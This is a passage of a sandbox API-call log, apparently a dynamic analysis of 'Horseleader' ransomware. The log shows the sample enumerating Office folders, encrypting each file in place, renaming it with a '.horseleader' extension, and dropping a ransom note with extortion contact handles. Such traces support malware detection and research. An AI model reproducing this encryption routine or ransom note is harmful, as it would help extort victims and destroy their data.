Controller\\Office32.en-us", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0244.578] GetProcessHeap () returned 0x780000 [0244.578] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.578] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\*") returned 100 [0244.578] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19b82c30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x19b82c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x19b82c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0244.580] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.581] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\.") returned 100 [0244.581] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.581] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19b82c30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x19b82c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x19b82c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="..", cAlternateFileName="")) returned 1 [0244.581] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.581] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\..") returned 101 [0244.581] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.581] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.581] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x19b82c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfc138cb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x567, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="Office32MUI.XML", cAlternateFileName="OFFICE~1.XML")) returned 1 [0244.581] lstrcmpiW (lpString1="Office32MUI.XML", lpString2="Windows") returned -1 [0244.581] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 114 [0244.581] StrStrIW (lpFirst="Office32MUI.XML", lpSrch=".horseleader") returned 0x0 [0244.581] lstrcmpW (lpString1="Office32MUI.XML", lpString2="#Decrypt#.txt") returned 1 [0244.581] lstrcmpW (lpString1="Office32MUI.XML", lpString2="_uninstalling_.png") returned 1 [0244.581] lstrlenW (lpString=".testttjffg") returned 11 [0244.581] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML", lpSrch=".testttjffg") returned 0x0 [0244.581] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.581] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.581] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.583] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 114 [0244.583] StrStrW (lpFirst="Office32MUI.XML", lpSrch=".txt") returned 0x0 [0244.583] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=1383) returned 1 [0244.583] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x567, lpOverlapped=0x0) returned 1 [0244.585] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffffa99, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.585] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x567, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x567, lpOverlapped=0x0) returned 1 [0244.586] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.586] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.586] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.586] CloseHandle (hObject=0x15c) returned 1 [0244.586] GetProcessHeap () returned 0x780000 [0244.586] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de080 [0244.586] wnsprintfW (in: pszDest=0x7de080, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML.horseleader") returned 126 [0244.586] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml.horseleader")) returned 1 [0244.587] GetProcessHeap () returned 0x780000 [0244.587] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de080 | out: hHeap=0x780000) returned 1 [0244.587] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc3e4630, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x19b82c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x93a, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0244.588] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0244.588] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 108 [0244.588] StrStrIW (lpFirst="SETUP.XML", lpSrch=".horseleader") returned 0x0 [0244.588] lstrcmpW (lpString1="SETUP.XML", lpString2="#Decrypt#.txt") returned 1 [0244.588] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0244.588] lstrlenW (lpString=".testttjffg") returned 11 [0244.588] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML", lpSrch=".testttjffg") returned 0x0 [0244.588] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.588] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.588] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.589] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 108 [0244.589] StrStrW (lpFirst="SETUP.XML", lpSrch=".txt") returned 0x0 [0244.589] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=2362) returned 1 [0244.589] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x93a, lpOverlapped=0x0) returned 1 [0244.591] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffff6c6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.591] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x93a, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x93a, lpOverlapped=0x0) returned 1 [0244.591] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.591] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.592] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.592] CloseHandle (hObject=0x15c) returned 1 [0244.592] GetProcessHeap () returned 0x780000 [0244.592] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de080 [0244.592] wnsprintfW (in: pszDest=0x7de080, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML.horseleader") returned 120 [0244.592] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml.horseleader")) returned 1 [0244.593] GetProcessHeap () returned 0x780000 [0244.593] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de080 | out: hHeap=0x780000) returned 1 [0244.593] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc3e4630, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x19b82c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x93a, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="SETUP.XML", cAlternateFileName="")) returned 0 [0244.593] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0244.593] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\#Decrypt#.txt") returned 112 [0244.593] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.595] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0244.596] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0244.597] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0244.597] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0244.597] CloseHandle (hObject=0x1a4) returned 1 [0244.597] GetProcessHeap () returned 0x780000 [0244.597] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0244.597] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x22200730, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x22200730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x22200730, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="Office32.WW", cAlternateFileName="")) returned 1 [0244.597] lstrcmpiW (lpString1="Office32.WW", lpString2="Windows") returned -1 [0244.597] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW") returned 95 [0244.597] lstrcmpW (lpString1="Office32.WW", lpString2=".") returned 1 [0244.597] lstrcmpW (lpString1="Office32.WW", lpString2="..") returned 1 [0244.597] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0244.597] GetProcessHeap () returned 0x780000 [0244.598] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.598] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\*") returned 97 [0244.598] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x22200730, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x22200730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x22200730, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0244.599] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.599] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\.") returned 97 [0244.599] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.599] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x22200730, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x22200730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x22200730, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="..", cAlternateFileName="")) returned 1 [0244.599] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.599] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\..") returned 98 [0244.599] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.599] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.599] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe09b760, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x22200730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfe09b760, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10b2, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="Office32WW.XML", cAlternateFileName="OFFICE~1.XML")) returned 1 [0244.599] lstrcmpiW (lpString1="Office32WW.XML", lpString2="Windows") returned -1 [0244.599] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 110 [0244.599] StrStrIW (lpFirst="Office32WW.XML", lpSrch=".horseleader") returned 0x0 [0244.599] lstrcmpW (lpString1="Office32WW.XML", lpString2="#Decrypt#.txt") returned 1 [0244.599] lstrcmpW (lpString1="Office32WW.XML", lpString2="_uninstalling_.png") returned 1 [0244.599] lstrlenW (lpString=".testttjffg") returned 11 [0244.600] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML", lpSrch=".testttjffg") returned 0x0 [0244.600] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.600] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.600] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.600] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 110 [0244.600] StrStrW (lpFirst="Office32WW.XML", lpSrch=".txt") returned 0x0 [0244.600] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=4274) returned 1 [0244.600] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x10b2, lpOverlapped=0x0) returned 1 [0244.603] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffef4e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.603] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x10b2, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x10b2, lpOverlapped=0x0) returned 1 [0244.603] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.603] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.604] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.604] CloseHandle (hObject=0x15c) returned 1 [0244.604] GetProcessHeap () returned 0x780000 [0244.604] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de080 [0244.604] wnsprintfW (in: pszDest=0x7de080, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML.horseleader") returned 122 [0244.604] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml.horseleader")) returned 1 [0244.605] GetProcessHeap () returned 0x780000 [0244.605] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de080 | out: hHeap=0x780000) returned 1 [0244.605] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | 